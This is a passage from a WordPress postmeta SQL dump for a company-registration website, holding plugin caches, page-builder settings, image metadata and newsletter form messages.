1f\";a:2:{s:7:\"expires\";i:1490142685;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:70;}i:1;a:1:{s:2:\"id\";i:237;}i:2;a:1:{s:2:\"id\";i:77;}}}}'),(2504,62,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1490557798;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:59;}i:1;a:1:{s:2:\"id\";i:28;}i:2;a:1:{s:2:\"id\";i:65;}}}}'),(2505,122,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1486202563;s:7:\"payload\";a:0:{}}}'),(2506,91,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1485553561;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:329;}i:1;a:1:{s:2:\"id\";i:324;}i:2;a:1:{s:2:\"id\";i:118;}}}}'),(2507,103,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1488119191;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:105;}i:1;a:1:{s:2:\"id\";i:329;}i:2;a:1:{s:2:\"id\";i:324;}}}}'),(2508,114,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1486630023;s:7:\"payload\";a:0:{}}}'),(2509,109,'_jetpack_related_posts_cache','a:0:{}'),(2510,68,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1487494515;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:69;}i:1;a:1:{s:2:\"id\";i:62;}i:2;a:1:{s:2:\"id\";i:76;}}}}'),(2511,67,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1490364839;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:72;}i:1;a:1:{s:2:\"id\";i:65;}i:2;a:1:{s:2:\"id\";i:68;}}}}'),(2513,69,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1489923233;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:68;}i:1;a:1:{s:2:\"id\";i:70;}i:2;a:1:{s:2:\"id\";i:72;}}}}'),(2514,105,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1488164754;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:103;}i:1;a:1:{s:2:\"id\";i:96;}i:2;a:1:{s:2:\"id\";i:335;}}}}'),(2524,132,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1486722919;s:7:\"payload\";a:0:{}}}'),(2525,437,'_edit_lock','1464634677:1'),(2526,437,'_edit_last','1'),(2527,437,'_wp_page_template','full-width-page.php'),(2528,437,'_responsive_layout','default'),(2529,437,'page-specific-menu-items_currentpage_items','a:7:{i:0;s:2:\"34\";i:1;s:2:\"31\";i:2;s:2:\"32\";i:3;s:2:\"33\";i:4;s:2:\"30\";i:5;s:3:\"186\";i:6;s:0:\"\";}'),(2530,99,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1486717163;s:7:\"payload\";a:0:{}}}'),(2531,118,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1486766968;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:329;}i:1;a:1:{s:2:\"id\";i:324;}i:2;a:1:{s:2:\"id\";i:91;}}}}'),(2532,319,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1486912887;s:7:\"payload\";a:0:{}}}'),(2533,144,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1486956029;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:329;}i:1;a:1:{s:2:\"id\";i:324;}i:2;a:1:{s:2:\"id\";i:335;}}}}'),(2535,437,'dojodigital_toggle_title','on'),(2536,459,'_edit_lock','1465314158:1'),(2537,459,'_edit_last','1'),(2538,459,'_wp_page_template','full-width-page.php'),(2539,459,'_responsive_layout','default'),(2540,459,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(2542,459,'_wpas_done_all','1'),(2548,491,'_edit_lock','1471891054:1'),(2549,491,'_edit_last','1'),(2550,491,'_wp_page_template','landing-page.php'),(2551,491,'_responsive_layout','default'),(2552,491,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(2553,491,'_wpas_done_all','1'),(2554,496,'_edit_lock','1471897588:1'),(2555,496,'_edit_last','1'),(2556,496,'_wp_page_template','landing-page.php'),(2557,496,'_responsive_layout','default'),(2558,496,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(2560,496,'_wpas_done_all','1'),(2562,136,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1486197310;s:7:\"payload\";a:0:{}}}'),(2563,397,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(2565,91,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(2566,4,'dojodigital_toggle_title','on'),(2567,4,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(2593,80,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(2595,80,'_downloadable_files','a:1:{s:32:\"d24217f9913a0df845597a7082a0f939\";a:3:{s:2:\"id\";s:32:\"d24217f9913a0df845597a7082a0f939\";s:4:\"name\";s:46:\"What I Need To Know Before I Start My Business\";s:4:\"file\";s:148:\"https://companyregistration.online/wp-content/uploads/woocommerce_uploads/2016/03/WHAT-I-NEED-TO-KNOW-BEFORE-I-START-MY-BUSINESS-IN-SOUTH-AFRICA.pdf\";}}'),(2596,80,'_download_limit','2'),(2597,80,'_download_expiry',''),(2598,80,'_download_type',''),(2599,128,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1489316876;s:7:\"payload\";a:0:{}}}'),(2600,83,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1488150094;s:7:\"payload\";a:0:{}}}'),(2601,409,'text_previously_unsubscribed','It seems that you have previously unsubscribed, so we can not automatically resubscribe you.'),(2602,408,'text_subscribed','Thank you, your request was successful! Please check your email inbox or spam folder for the download link'),(2603,408,'text_invalid_email','Please provide a valid email address.'),(2604,408,'text_required_field_missing','Please fill in the required fields.'),(2605,408,'text_already_subscribed','Given email address is already subscribed, thank you!'),(2606,408,'text_error','Oops. Something went wrong. Please try again later.'),(2607,408,'text_unsubscribed','You were successfully unsubscribed.'),(2608,408,'text_not_subscribed','Given email address is not subscribed.'),(2609,408,'text_no_lists_selected','Please select at least one list.'),(2610,408,'text_previously_unsubscribed','It seems that you have previously unsubscribed, so we can not automatically resubscribe you.'),(2710,557,'_edit_lock','1481004288:1'),(2711,557,'_edit_last','1'),(2712,557,'_wp_page_template','full-width-page.php'),(2713,557,'_responsive_layout','default'),(2714,557,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(2715,557,'_et_pb_use_builder','on'),(2716,557,'_et_pb_ab_bounce_rate_limit','5'),(2717,557,'_et_pb_ab_stats_refresh_interval','hourly'),(2718,557,'_et_pb_old_content',''),(2719,557,'_et_pb_enable_shortcode_tracking','on'),(2720,557,'_et_pb_custom_css',''),(2721,557,'_et_pb_light_text_color','#FFFFFF'),(2722,557,'_et_pb_dark_text_color','#666666'),(2723,557,'_et_pb_content_area_background_color','#e0e0e0'),(2724,557,'_et_pb_section_background_color','#FFFFFF'),(2725,557,'_et_pb_use_ab_testing','off'),(2726,557,'_et_pb_ab_goal_module','row'),(2727,566,'_edit_lock','1466461218:1'),(2728,566,'_edit_last','1'),(2729,566,'_responsive_layout','default'),(2730,566,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(2731,566,'_et_pb_use_builder','on'),(2732,566,'_et_pb_ab_bounce_rate_limit','5'),(2733,566,'_et_pb_ab_stats_refresh_interval','hourly'),(2734,566,'_et_pb_old_content',''),(2735,566,'_et_pb_enable_shortcode_tracking',''),(2736,566,'_et_pb_custom_css',''),(2737,566,'_et_pb_light_text_color','#FFFFFF'),(2738,566,'_et_pb_dark_text_color','#666666'),(2739,566,'_et_pb_content_area_background_color',''),(2740,566,'_et_pb_section_background_color','#FFFFFF'),(2741,566,'_jetpack_related_posts_cache','a:0:{}'),(2742,80,'_wp_old_slug','free-report'),(2745,571,'_edit_lock','1525441425:1'),(2746,571,'_edit_last','1'),(2749,571,'_wp_page_template','default'),(2750,571,'_responsive_layout','default'),(2751,571,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(2752,571,'_et_pb_use_builder','on'),(2754,571,'_et_pb_ab_stats_refresh_interval','hourly'),(2755,571,'_et_pb_old_content',''),(2756,571,'_et_pb_enable_shortcode_tracking',''),(2757,571,'_et_pb_custom_css',''),(2866,67,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(2867,4,'_et_pb_use_builder','on'),(2870,4,'_et_pb_old_content','<div>[smartslider3 slider=2]</div><div> </div><p style=\"text-align: center;\"><span style=\"font-size: 18pt; font-family: arial,helvetica,sans-serif;\">Get all your business registrations sorted from <a href=\"https://companyregistration.online/product-category/company-registration/\">company registration</a> to <a href=\"https://companyregistration.online/product-category/tax-registration/\">tax registration</a></span></p><p style=\"text-align: center;\">...</p><p><script src=\"http://maw.digitalstrategies.biz/f/embed.php?id=5\" type=\"text/javascript\" charset=\"utf-8\"></script></p>'),(2871,4,'_et_pb_enable_shortcode_tracking',''),(2872,4,'_et_pb_custom_css',''),(2979,649,'_wp_attached_file','2016/03/Private-Company-registration-cover.jpg'),(2980,649,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:46:\"2016/03/Private-Company-registration-cover.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:46:\"Private-Company-registration-cover-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:46:\"Private-Company-registration-cover-510x510.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:46:\"Private-Company-registration-cover-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:46:\"Private-Company-registration-cover-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:46:\"Private-Company-registration-cover-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:46:\"Private-Company-registration-cover-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:46:\"Private-Company-registration-cover-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:46:\"Private-Company-registration-cover-510x510.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:46:\"Private-Company-registration-cover-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:46:\"Private-Company-registration-cover-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:46:\"Private-Company-registration-cover-200x200.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:46:\"Private-Company-registration-cover-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:46:\"Private-Company-registration-cover-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-600\";a:4:{s:4:\"file\";s:46:\"Private-Company-registration-cover-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2981,28,'_thumbnail_id','649'),(2982,28,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(2983,650,'_wp_attached_file','2016/07/Free-Report-cover-e1467460316864.jpg'),(2984,650,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:95;s:6:\"height\";i:134;s:4:\"file\";s:44:\"2016/07/Free-Report-cover-e1467460316864.jpg\";s:5:\"sizes\";a:11:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:43:\"Free-Report-cover-e1467460316864-95x100.jpg\";s:5:\"width\";i:95;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Free-Report-cover-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Free-Report-cover-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:43:\"Free-Report-cover-e1467460316864-95x100.jpg\";s:5:\"width\";i:95;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"Free-Report-cover-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"Free-Report-cover-510x722.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:722;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:29:\"Free-Report-cover-100x142.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:142;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:29:\"Free-Report-cover-150x212.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:29:\"Free-Report-cover-200x283.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:29:\"Free-Report-cover-300x425.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:29:\"Free-Report-cover-450x637.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:637;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2985,650,'_edit_lock','1467460189:1'),(2986,650,'_wp_attachment_backup_sizes','a:5:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:595;s:6:\"height\";i:842;s:4:\"file\";s:21:\"Free-Report-cover.jpg\";}s:18:\"full-1467458876185\";a:3:{s:5:\"width\";i:195;s:6:\"height\";i:276;s:4:\"file\";s:36:\"Free-Report-cover-e1467458859224.jpg\";}s:18:\"full-1467458896644\";a:3:{s:5:\"width\";i:95;s:6:\"height\";i:134;s:4:\"file\";s:36:\"Free-Report-cover-e1467458876185.jpg\";}s:18:\"full-1467458908846\";a:3:{s:5:\"width\";i:95;s:6:\"height\";i:134;s:4:\"file\";s:36:\"Free-Report-cover-e1467458896644.jpg\";}s:18:\"full-1467460316864\";a:3:{s:5:\"width\";i:95;s:6:\"height\";i:134;s:4:\"file\";s:36:\"Free-Report-cover-e1467458908846.jpg\";}}'),(2987,650,'su_slide_link',''),(2988,650,'_edit_last','1'),(2989,650,'_wp_attachment_image_alt','Ebook: \"What I need to know before I start my business\"'),(2990,237,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(2991,651,'_wp_attached_file','2016/07/Free-Report-cover-1.jpg'),(2992,651,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:595;s:6:\"height\";i:842;s:4:\"file\";s:31:\"2016/07/Free-Report-cover-1.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"Free-Report-cover-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"Free-Report-cover-1-510x722.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:722;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"Free-Report-cover-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Free-Report-cover-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Free-Report-cover-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"Free-Report-cover-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"Free-Report-cover-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"Free-Report-cover-1-510x722.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:722;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-100\";a:4:{s:4:\"file\";s:31:\"Free-Report-cover-1-100x142.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:142;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-150\";a:4:{s:4:\"file\";s:31:\"Free-Report-cover-1-150x212.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-200\";a:4:{s:4:\"file\";s:31:\"Free-Report-cover-1-200x283.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-300\";a:4:{s:4:\"file\";s:31:\"Free-Report-cover-1-300x425.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"responsive-450\";a:4:{s:4:\"file\";s:31:\"Free-Report-cover-1-450x637.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:637;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2993,496,'_et_pb_use_builder',''),(2994,496,'_et_pb_ab_bounce_rate_limit','5'),(2995,496,'_et_pb_ab_stats_refresh_interval','hourly'),(2996,496,'_et_pb_old_content',''),(2997,496,'_et_pb_enable_shortcode_tracking',''),(2998,496,'_et_pb_custom_css',''),(2999,496,'_et_pb_light_text_color','#FFFFFF'),(3000,496,'_et_pb_dark_text_color','#666666'),(3001,496,'_et_pb_content_area_background_color',''),(3002,496,'_et_pb_section_background_color','#FFFFFF'),(3023,64,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(3024,62,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(3025,75,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(3026,76,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(3027,74,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(3028,78,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(3029,77,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(3030,662,'_wp_attached_file','2016/07/00128.mp4'),(3031,662,'_wp_attachment_metadata','a:9:{s:7:\"bitrate\";i:2468244;s:8:\"filesize\";i:1851231;s:9:\"mime_type\";s:15:\"video/quicktime\";s:6:\"length\";i:6;s:16:\"length_formatted\";s:4:\"0:06\";s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";}'),(3032,571,'_wpas_done_all','1'),(3034,65,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(3035,68,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(3036,69,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(3037,70,'_wpas_done_all','1'),(3038,70,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(3039,70,'_jetpack_related_posts_cache','a:1:{s:32:\"32b0bf150bb6bd30c74ed5fafdacd61f\";a:2:{s:7:\"expires\";i:1490202802;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:72;}i:1;a:1:{s:2:\"id\";i:69;}i:2;a:1:{s:2:\"id\";i:74;}}}}'),(3040,73,'page-specific-menu-items_currentpage_items','a:1:{i:0;s:0:\"\";}'),(3042,73,'_jetpack_related_posts_cache','a:0:{}'),(3107,3369,'_wpas_done_all','1'),(3108,3369,'_et_pb_built_for_post_type','page'),(3109,3357,'_wpas_done_all','1'),(3110,3357,'_et_pb_built_for_post_type','page'),(3111,3335,'_wpas_done_all','1'),(3112,3335,'_et_pb_built_for_post_type','page'),(3195,24573,'_wpas_done_all','1'),(3196,24573,'_et_pb_built_for_post_type','page'),(3197,24573,'_et_pb_use_builder','on'),(3198,24573,'_et_pb_ab_bounce_rate_limit','5'),(3199,24573,'_et_pb_ab_stats_refresh_interval','hourly'),(3200,24573,'_et_pb_old_content',''),(3201,24573,'_et_pb_enable_shortcode_tracking',''),(3202,24573,'_et_pb_custom_css',''),(3203,24573,'_et_pb_light_text_color','#FFFFFF'),(3204,24573,'_et_pb_dark_text_color','#666666'),(3205,24573,'_et_pb_content_area_background_color',''),(3206,24573,'_et_pb_section_background_color','#FFFFFF'),(3207,5747,'_wpas_done_all','1'),(3208,5747,'_et_pb_built_for_post_type','page'),(3209,5746,'_wpas_done_all','1'),(3210,5746,'_et_pb_built_for_post_type','page'),(3211,5745,'_wpas_done_all','1'),(3212,5745,'_et_pb_built_for_post_type','page'),(3213,5744,'_wpas_done_all','1'),(3214,5744,'_et_pb_built_for_post_type','page'),(3215,24564,'_wpas_done_all','1'),(3216,24564,'_et_pb_built_for_post_type','page'),(3217,24565,'_wpas_done_all','1'),(3218,24565,'_et_pb_built_for_post_type','page'),(3219,5741,'_wpas_done_all','1'),(3220,5741,'_et_pb_built_for_post_type','page'),(3221,5740,'_wpas_done_all','1'),(3222,5740,'_et_pb_built_for_post_type','page'),(3223,5740,'_et_pb_use_builder','on'),(3224,5740,'_et_pb_ab_bounce_rate_limit','5'),(3225,5740,'_et_pb_ab_stats_refresh_interval','hourly'),(3226,5740,'_et_pb_old_content',''),(3227,5740,'_et_pb_enable_shortcode_tracking',''),(3228,5740,'_et_pb_custom_css',''),(3229,5740,'_et_pb_light_text_color','#FFFFFF'),(3230,5740,'_et_pb_dark_text_color','#666666'),(3231,5740,'_et_pb_content_area_background_color',''),(3232,5740,'_et_pb_section_background_color','#FFFFFF'),(3233,5739,'_wpas_done_all','1'),(3234,5739,'_et_pb_built_for_post_type','page'),(3235,5738,'_wpas_done_all','1'),(3236,5738,'_et_pb_built_for_post_type','page'),(3237,5738,'_et_pb_use_builder','on'),(3238,5738,'_et_pb_ab_bounce_rate_limit','5'),(3239,5738,'_et_pb_ab_stats_refresh_interval','hourly'),(3240,5738,'_et_pb_old_content',''),(3241,5738,'_et_pb_enable_shortcode_tracking',''),(3242,5738,'_et_pb_custom_css',''),(3243,5738,'_et_pb_light_text_color','#FFFFFF'),(3244,5738,'_et_pb_dark_text_color','#666666'),(3245,5738,'_et_pb_content_area_background_color',''),(3246,5738,'_et_pb_section_background_color','#FFFFFF'),(3247,5737,'_wpas_done_all','1'),(3248,5737,'_et_pb_built_for_post_type','page'),(3249,5737,'_et_pb_use_builder','on'),(3250,5737,'_et_pb_ab_bounce_rate_limit','5'),(3251,5737,'_et_pb_ab_stats_refresh_interval','hourly'),(3252,5737,'_et_pb_old_content',''),(3253,5737,'_et_pb_enable_shortcode_tracking',''),(3254,5737,'_et_pb_custom_css',''),(3255,5737,'_et_pb_light_text_color','#FFFFFF'),(3256,5737,'_et_pb_dark_text_color','#666666'),(3257,5737,'_et_pb_content_area_background_color',''),(3258,5737,'_et_pb_section_background_color','#FFFFFF'),(3259,5736,'_wpas_done_all','1'),(3260,5736,'_et_pb_built_for_post_type','page'),(3261,5735,'_wpas_done_all','1'),(3262,5735,'_et_pb_built_for_post_type','page'),(3263,5734,'_wpas_done_all','1'),(3264,5734,'_et_pb_built_for_post_type','page'),(3265,5734,'_et_pb_use_builder','on'),(3266,5734,'_et_pb_ab_bounce_rate_limit','5'),(3267,5734,'_et_pb_ab_stats_refresh_interval','hourly'),(3268,5734,'_et_pb_old_content',''),(3269,5734,'_et_pb_enable_shortcode_tracking',''),(3270,5734,'_et_pb_custom_css',''),(3271,5734,'_et_pb_light_text_color','#FFFFFF'),(3272,5734,'_et_pb_dark_text_color','#666666'),(3273,5734,'_et_pb_content_area_background_color',''),(3274,5734,'_et_pb_section_background_color','#FFFFFF'),(3275,5733,'_wpas_done_all','1'),(3276,5733,'_et_pb_built_for_post_type','page'),(3277,24566,'_wpas_done_all','1'),(3278,24566,'_et_pb_built_for_post_type','page'),(3279,5731,'_wpas_done_all','1'),(3280,5731,'_et_pb_built_for_post_type','page'),(3281,24567,'_wpas_done_all','1'),(3282,24567,'_et_pb_built_for_post_type','page'),(3283,24567,'_et_pb_use_builder','on'),(3284,24567,'_et_pb_ab_bounce_rate_limit','5'),(3285,24567,'_et_pb_ab_stats_refresh_interval','hourly'),(3286,24567,'_et_pb_old_content',''),(3287,24567,'_et_